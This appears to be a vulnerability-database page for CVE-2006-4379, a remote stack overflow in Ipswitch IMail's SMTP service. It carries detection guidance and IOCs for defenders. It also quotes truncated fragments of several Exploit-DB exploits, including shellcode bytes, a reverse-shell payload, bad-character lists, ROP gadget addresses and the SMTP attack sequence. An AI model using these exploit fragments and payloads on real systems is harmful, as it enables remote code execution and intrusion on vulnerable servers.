CVE-2006-4379
published 2006-09-08CVE-2006-4379: Stack-based buffer overflow in the SMTP Daemon in Ipswitch Collaboration 2006 Suite Premium and Standard Editions, IMail, IMail Plus, and IMail Secure allows…
PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
60.04%
99.0th percentile
Stack-based buffer overflow in the SMTP Daemon in Ipswitch Collaboration 2006 Suite Premium and Standard Editions, IMail, IMail Plus, and IMail Secure allows remote attackers to execute arbitrary code via a long string located after an '@' character and before a ':' character.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | imail_plus | — | — |
| ipswitch | imail_secure_server | — | — |
| ipswitch | ipswitch_collaboration_suite | — | — |
| ipswitch | ipswitch_collaboration_suite | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x81\xc4\xff\xef\xff\xff\x44
bytes↗
\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58
bytes↗
\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93
- →Detect oversized RCPT TO commands where a long string appears between '@' and ':' characters — this is the specific trigger pattern for the stack overflow. ↗
- →Alert on SMTP RCPT TO commands exceeding normal length bounds (>560 bytes) targeting port 25 on Ipswitch IMail servers. ↗
- →Monitor for SMTP sessions that send EHLO, MAIL FROM, then a malformed RCPT TO with embedded null-free shellcode — the exploit sequence is EHLO → MAIL FROM → malicious RCPT TO. ↗
- →Bad characters for payload encoding are \x00 \x0d \x0a \x20 \x3e \x22 \x40; absence of these bytes in a long RCPT TO argument is a strong indicator of encoded shellcode. ↗
- →After successful exploitation, watch for a bind shell on TCP port 4444 on the victim IMail server. ↗
- →The exploit targets SmtpDLL.dll / SMTPDLL.DLL ROP gadgets; monitor for abnormal return addresses into these DLLs (0x10036f71, 0x100188c3, 0x100191c4) in crash dumps or memory forensics. ↗
- ·The overflow is only triggered when the long string is positioned specifically after '@' and before ':' in the RCPT TO argument; generic SMTP length checks on the full command line may miss this if they do not parse the internal structure. ↗
- ·The exploit requires the payload to be free of restricted bytes (\x00 \x0d \x0a \x20 \x3e \x22 \x40); detection signatures based solely on these bytes will miss encoded payloads. ↗
- ·The ROP gadget addresses differ across IMail versions and Windows OS/SP combinations; a single return-address signature will not cover all exploit variants. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb·2021-08-18·CVSS 7.5
CVE-2006-1236 [HIGH] crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
---
# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236
#!/bin/python
import socket
import time
# Crash at 4379
# EIP Offset at 4368
# Badchar \x00\x20
# ECX Size 170
# CALL ECX 0x080640eb
size = 4379
# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56
Exploit-DB
Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow
exploitdb·2007-02-04
CVE-2006-4379 Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow
Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow
---
#!/usr/bin/perl
# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
# https://www.securityfocus.com/bid/19885
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO " . "\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
send $socket, $request, 0;
print "[+] Sent MAIL FROM\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $buffer;
send $
Exploit-DB
Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)
exploitdb·2007-02-04
CVE-2006-4379 Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)
Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Jacopo Cervini ', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv'
Exploit-DB
Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow
exploitdb·2006-10-19
CVE-2006-4379 Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow
Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow
---
// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update
#include
#include
#include
#include
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[1028];
// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58"
"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\
No writeups or analysis indexed.
http://secunia.com/advisories/21795http://securitytracker.com/id?1016803http://securitytracker.com/id?1016804http://www.ipswitch.com/support/ics/updates/ics20061.asphttp://www.ipswitch.com/support/imail/releases/im20061.asphttp://www.securityfocus.com/archive/1/445521/100/0/threadedhttp://www.securityfocus.com/bid/19885http://www.vupen.com/english/advisories/2006/3496http://www.zerodayinitiative.com/advisories/ZDI-06-028.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/28789http://secunia.com/advisories/21795http://securitytracker.com/id?1016803http://securitytracker.com/id?1016804http://www.ipswitch.com/support/ics/updates/ics20061.asphttp://www.ipswitch.com/support/imail/releases/im20061.asphttp://www.securityfocus.com/archive/1/445521/100/0/threadedhttp://www.securityfocus.com/bid/19885http://www.vupen.com/english/advisories/2006/3496http://www.zerodayinitiative.com/advisories/ZDI-06-028.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/28789
2006-09-08
Published